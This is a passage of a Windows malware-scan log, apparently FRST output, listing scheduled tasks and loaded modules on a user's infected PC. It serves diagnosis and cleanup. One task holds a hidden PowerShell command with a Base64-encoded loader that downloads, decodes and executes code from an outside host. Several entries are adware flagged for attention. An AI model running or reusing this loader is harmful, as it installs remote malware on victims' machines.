Task: {43723026-9A3C-435B-9B1E-F9B16F6CB5F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {47D87ACF-3A35-4E76-B65F-873DECC2E064} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {4994821B-ED79-4D33-A90A-6EF9B1870A82} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-05-13] (CyberLink Corp.)
Task: {4CB0D980-A0AF-4ED7-994D-B8E7B27A5419} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {4CB26727-2B66-44ED-9CB5-3BFE2BBD53F5} - System32\Tasks\{20EB2353-BC38-4995-9A61-A8D24A2C8361} => pcalua.exe -a C:\Users\Charlie\Downloads\chromeinstall-8u31.exe -d C:\Users\Charlie\Downloads
Task: {4F27F764-3DF6-41E2-B13E-C181E52BD9FE} - System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGMAbwBuAHQAZQB4AGYAaQB4AC4AaQBuAGYAbwAvAHUALwA/AGEAPQA2AEUARQB4AFkAdgAtADkAMQBfAHAANQBvAHUAZwB6AEIAbwAyAGsAbwBlADIAQwBhAGoARQBmAHEAVwBQAHEAUwBFADUASQBXAHEAMQBtAE8AWQBVAFEATABRAEIAdQBhAEMANQBDAGYAMAB5AFcAZwAwAFUASABfAE8AcgAwADQAbQBMAGwAVAAxAGwAaABqAFQATQBtAGEAUQBHAGUARgBaAHMAZQBXAGYARQB5AGgAVQBnAEkANABoAFgAcgA1AHgAagBCAHcATAB1AGUAcABWAGsAeQBZAHoAUwBnAHYASQBTAEcARgBFAFoASQBTAFgAZwBNAEEAcgB3AFMAQQBYAGQAbQBIAGgAcwBiAGYATQBRAFEAVgBDAFYAVgBiAF8AVQBNAEIANgB1AE4AdABZADcAcwBLAHkAMQA3AF8AVQA3AEwAbwB4AFEAegBrAEsAeABJAGYAMwBQAFMAcAA4ADMANwAwAHYAUgBVAGIAbgBBAHQAQQBVAEIATABWAGUAbQBVAHMAZQBxAEkAdwB5AHIATwBLAGQAYgBaAG8AOABaAHgAMgBfAGwAWgAzAGwAMQBVAE0ATQBUAG4AWQBpAHUAdgBKAC0ANgA1AEUALQBsAFcAeAAzAEgAMAB4AE4ARQAzAHoAMAAyAEMAQQBiAEkAUgBnAHUAZgAyAFcAMQBGAEwAbABDAGsAQwAtADYATgBmAE0ALQBkADMAcwBkAHgAaABjAFAAdABqAGEAUABPAEYAdABCAHAAdgBCAC0ALQBIAGIARwB4AG0ATQBTAEgAagAxAGEAOQByAGgAYgBNAGcAbwBUAEYAbgBVAGUAXwA5AFAAeABqAC0AaABlAFUAYgB3ADUAWQBrAHQAQQAyAHkATQBtAEkAdABDAEIAawBIAHgAUABZADkASgBXAFgASwBJAC0AVgBfAEMASQBpAHMAQQB0AE4AcgBLAGgAWAA2AGoASgB5AFgAZQBKAHQAUABkAEsAUABOAGkAegA1AG4AMQBCAEgAbgB1AHYAVABrAHgAdgB6AFcAWQBuAFEANwBZAFcAdQBrADQAQwBtAEUAMQBvAGwAeABGADEAcgBJAEQAbgA5AFUARABTAFgAYgBxAGcAYQBsAGUASQBNAGYAZwBlAEYAbgBNAGwAVwBSAEgAaABJAFkAXwBPAHUAbQA2AG0AQQAxAHcAQQBKAFcAVgA2AHMASQBHAFQAMwBYAGUASgBWAFQAawBkADUAUQBWAFkAcgBlADYAcQByAHcASQBNAHIAbAB1AFQANAAtAF8AMAA5ADMANgBMAEwAaQBxAEgAdQBjAG4AUwBWAF8AZQBtAE8AYwBEAHQAYwBLAEEAbQBTAEoAWgBNADQAZgBLADMAMABoAGsARQBtAG4ANwA3AHAAYQB6AHYAWgBBADYASwAtAFEAZwBCAG8AYgBkAHoATABzAGYAdQBmAE0ANgBQAEUAMwBhADIATABIAE4AWQBxAGsAQwA0ADAAdwBSADUAZgA0ADUAMwBNAG8AUABnAC0AZwAxAGIAVwBVAGQANgBXAFoAaAAzAHkAcABxAC0AZgBVAGsARQA5AHYASQBkAHoAYQBlAHYATwBaAFMAMgBSAE0AdgB3AHMAdQBjADEAeABOAGgAZABDAEkAQgA5AGQARQBDAEEAUAA5ADgAegBYAHoAVgBUAG8AaABMAEwAOAB1AG8ALQBuAG8AMABHAGYARwBkAFQATgBaAHoAQQBZAE4ARABDAFoAcQBnAFgAUwBJAHUAVQA0ADcAVABWAE4AawAxAFAAegBKAHUAaQBhADMAVABsAFUATgB0AG0AQQAtAFMAMwBQAE8AVwBmAEsAUgBVAFUATQA1AGYAcwA4AEcAVgBkAGIAUwBIAG4AZQB1AFEARwBTADYAUQB3AGsAUQB1AFcAaABnADEAcwB6AGUAcgBXAHgAdAB3AHoATQBRAEkASgA4AG0ALQAtAHYASQBRAEIAQgBJAGgAUgBDAGsARQBpAEYASwBzAE0AaAA2AGYAVwBlAGMANQBFAFcAYQBnAG0AcwBCADgATwBMAGgAcAB2ADYAawAxAEoAQwBaAEUAQwA0ADMARgAtAFAAZwBQAHcAdQB1AGYAbwBiAEwANABaAEgANwBJAHoAcQBIAE4ATQB4AGYAeQBSADYAbABhAFgAUABWAHAAZwBrAGoAegBjAEMAOABNAFcAWQBjADAANgBVAHMAbQBvAHgARgA0AHgAcQBLAEkAbQBGADgAUQBvAHUATABNAHMAQwBRAGYAZgB3AGkASABZAEcAeABfAEUAWQB5AEYAYgBhAE4AcQBfAHYAWQAxAGoAOABuAFQAbABhAGUAawA1AG8AcwBuAE8ATwBCAGEAcgBEAEMAJgBjAD0AcAA5AHoAbwByAHQARgBvADUAVQA2AFYASwB5AGwAbAA2AFYAZAAwADcARgAtADkAQQBiADYARwBoAGIAawBHAFoAcABwAGoAZwBJAFMAaQBoAGEAQgBNAHEAbAA2AHUAeABVAGgAQwBTAFgAZwBZADAAaQBLAHAAYgB4AG8ASgB4AGoAegBoAHEAcwBMAFQAdwB6AGUAQgBKAGgAegBUADQANQBPAGoAVABSAG8ASgA5AF8AUwBkAHIAUwBLAHoAOQA5AFgAQQB0AGkALQB2ADMAQQBIAHAATAAxAFkAWABfAC0AXwA0AFcASQBlAHoATABhAGQAaABDAFkAOQBJAGwAUwB4AG8AQgA1ADQASABiAEcAZgBBAGYATABIAGMAZgBDAE4AdgBuAGwAbgBzAEIAVAB3AGIARQB6AGwATQBnAFIAUwBpADAAbgBQAGgAMABkAEUAawBCAG8AZwBvADIAOQBrAGoAZgBtADQAeAAzAEMAQgAxAE4ARgBqAGwAdABwAE0AVQBoADUAWQBlAG4AVwA0AHoANAA1AHEALQB0AFoARwAxAHYAQwAxADAAVwBwAHcAYQBiAHgAOQBRAHUAUwBmAHUAeABWAEwARQBSAE8AMQA3AC0AMABEAFYAZQBHAE4ANABmAHYAMwBmAGcAVgBfAEYAZgBQADgAZQAxAE0AYgBDAHoAUgBnAHgAaQBRAFAALQBiAEwAYgB1AHcAcgBtAE4ASAAxADkAQgB0AGgATQByAEUATQBwAEUASQBvADQAMABSAFoAQwBWADYAWQBHADYAMQBTAGwAOABhADMAOQBzAGEAdgBtAHIAXwBfAFoAaQB5ADkARwBwAGIATgBrAHkAWgBCAEIAdgBvAHgAegB6AEEAdwBrAFIAZQBxAFIAOABiAFcAdgB1AEgAUgBEAHYAZwA4AC0AYQBOAHIAaQA0AFgAMABMADUARwBqAFUAdABzAFMAWQA2AHQAOQBRAHUATwBUAHEATQBOAEEAWAAxAGUAdwByAE0AawBfAGEARwBiAHYATQA4AHoAXwB1AGoAcQBoAHQATAA4AGQAeQBSAEIANgAwAFMAZABYAEwAUgA4AHAAcgBkAGoAWQBDAHQAMwB6AEUAZABUAHIARAA0AGoAUwBsAEQAVwBWADQAWQAtAEQAbABwAGMANwBZAEgAawBtAGUATABxAHcAWABJAGkAbQB2ADcARQBWAFEAWQByAHUAegAyAFkAVwBnADgAbwB1AGsAQQA3AHkANQBoAHEAWgB5AGQAcQBZAEsAQwAwAFcAZwBjAHUATABGAFIAawA2AGQARABfAC0AYwB3AG8ANABIAHMAMQBmAHIAWABlAFQAUABxAFkAcwBJAFgATgBQAG0AMQBNAEEAegAzAHgAUgBnADMAVQA4ADQAdQBnAGMAbABPAEMAOAByAG8ATQA1AFYAVwBfAEsAVgByAEoAYQBsADMAWQBuAHcAbgBGADgALQAyAFkAZwBoAHkAMABKAEgANwBHAHYAYQBrAEwAaQBTAHAAVwBQADIAXwAtAFcATABPAHkAZQBfADUAWgA5AGkAcQBhAEQAWQBBAHoAdwBkAG4AUAB6ADMAagBZAE8ATABQAHYAQgB3AEcAbQBtAEMAMgBHAG4ATABCAGgAbAB3AGMAVwBFAGkAMwA4AGQATABtAEQAZgBWAE8AUABLADkAUABEAEgAWgBOAGQAawBvAHoAYQBTAGQAYQB4AHAAMQBZAFUAaAAzADEAZQBjAFIAYwB6AFIASwBqAG4AXwBlADgAVABhAHgAbgBMADgAVQBiADcAWAA2AHQARgBHAC0AUQBSAEsAXwBwADEASgA0AGwAUQB2ADkAYQBVAE4AMwBRAEMANwBjAHIAVwBxAHIAUwBrAEwAZwBoAHAAOQBSAEEANABUAFUALQBJAHgAZABwADEAWABwAGQAYgBKADgAMwB5AHAAaABfAEQAdABTADEARQBjAGMAUQBxAHYAZABGAFAAVQBRAFAAYgB2AHgAUQA0AHkAUAB2AE0AVABhAEIASgBEAEwAUgB1ADQAawAtAE0AdQAyAC0AUgBvAEwAeQBJAEgANQB3ADIAZABiAGgAUAA0AGsAaABiAEkAbgBvAFQAeABSAE4ARQBVAFgANgA1ADEAOABlAHIARABCAEQAQgBNAFIAUgBRAEgAcQBBAEIATQBUAFEAMwB1AFoASQA5AGcANQBlAHEATABmAC0ALQBfAEEASQBuAEQAcwBzAEYAVQBBAFYAcQBQAEcAOAB4AEUAVwBPAEQAeQBrAGwAcQB0AC0AVgB6ADcATQBrAHEANABOAFYAMwBqADYAMQAtAEMAOQBwAHEAVABiADYAYgAzAFoAdwBaAEgARQBwAHUAWAAwAEUATgBDAGYAXwBpAHMATgBMAGIAdABpAG8ASAByADkAUAB0ADkAWABjAEoAOABXADQATABfAHIAUwBQAE8AVgA3AGcAeAB2AFgARgBZAFMAbABHAGcARwBpADEAZABYAHcAeQBKACYAcgA9ADQAMAA5ADQAMQA5ADMAOAA4ADMAMwA3ADAAOAA4ADYANwAzADUAIgA7ACQAcwB0AHMAawA9ACIAewA3ADgAMABFADAAQgA0ADcALQA3AEEANwA4AC0AMABBADAARQAtADAAOQAxADEALQAwAEIANwA5ADAANQAwAEYAMQAxADAAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIATABVAFIATgBVAEoAVABHACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {50E6F317-59DB-422A-9B35-05CEE2D58C6D} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2015-01-28] ()
Task: {51C95B35-225E-452C-9301-234846811C7B} - System32\Tasks\Fusion Browser Launch Task => Chrome.exe --sch-launch --docked
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5AEE6A25-B4D6-49E7-B18D-ABD907487893} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {64926D10-C113-4849-8364-4A23DB2C3DAF} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-08-04] (McAfee, Inc.)
Task: {66CF5B26-85E0-4095-BBD6-31F18B44D146} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-30] (Dropbox, Inc.)
Task: {68515BA3-AB7D-4C48-81CD-C3A65A8AC7C1} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {6B93D5BA-BB45-4347-81DF-75BA6966225D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-03] (Adobe Systems Incorporated)
Task: {89ADF2EF-5764-435C-94D1-418A19E06A10} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {8DBAF71D-D981-4D7F-8D96-90E4F3566220} - System32\Tasks\WebUpdater Task => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)
Task: {8F71346F-9754-43AE-A404-6A5F027FC396} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2015-12-29] () <==== ATTENTION
Task: {8FF9009A-01AA-4BD7-ADF3-B9B364D804B1} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)
Task: {B09ED9A5-FF07-413E-8837-759CE1FA36FD} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {B68388AB-C415-428A-B356-E4BFC84963A3} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2015-12-29] () <==== ATTENTION
Task: {B77A26F5-7E7E-4C11-BE1E-955A618C1998} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)
Task: {C25A0339-CBFA-43B6-A68B-F52402B01256} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {C2DB69D1-5A12-447D-9C4A-D26C1277F20F} - System32\Tasks\HPCeeScheduleForCharlie => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {C85EF2F7-128A-4947-B39D-03AEE0EF3196} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2015-12-29] () <==== ATTENTION
Task: {CE9E7981-1275-407B-BBB4-40497F96FB2C} - System32\Tasks\WebUpdater LaunchTask => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)
Task: {D173A88A-027B-4BB6-88B4-6D29241A2D6C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core.job => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA.job => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForCharlie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2014-03-28 15:31 - 2014-03-28 15:31 - 02110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2014-03-28 15:27 - 2014-03-28 15:27 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2014-03-28 15:27 - 2014-03-28 15:27 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2014-03-28 15:27 - 2014-03-28 15:27 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2014-03-28 15:48 - 2014-03-28 15:48 - 00367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2014-03-28 15:48 - 2014-03-28 15:48 - 00712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2014-10-29 11:03 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-10-30 15:03 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2013-11-29 00:32 - 2013-11-29 00:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-11-29 00:38 - 2013-11-29 00:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00017168 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe
2016-01-10 11:54 - 2016-01-10 11:54 - 00008976 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Service.Logger.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00028432 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WcfService.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 01983640 _____ () C:\Program Files (x86)\Get-a-Clip\MFLService2.exe
2016-01-10 11:55 - 2016-01-10 11:55 - 00116208 _____ () C:\Program Files (x86)\Get-a-Clip\mflstart.exe
2016-01-10 11:56 - 2015-12-30 09:15 - 21754368 _____ () C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe
2016-01-10 11:56 - 2015-12-30 09:15 - 00255488 _____ () C:\Program Files\WebUpdater\1.0.24.0\isa_x64.dll
2016-01-10 11:56 - 2015-07-31 12:37 - 00584704 _____ () C:\Program Files\WebUpdater\1.0.24.0\detection_rules_x64.dll
2015-12-11 12:38 - 2015-10-30 19:59 - 00034768 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00019408 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00022848 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Random.OSRNG.winrandom.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00023352 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Util._counter.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00042296 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Cipher._AES.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00116688 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2015-12-11 12:38 - 2015-10-30 19:59 - 00093640 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00018376 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\select.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00019760 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00105928 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32api.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00392144 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2015-12-11 12:38 - 2015-12-08 16:36 - 00381752 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00692688 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\unicodedata.pyd
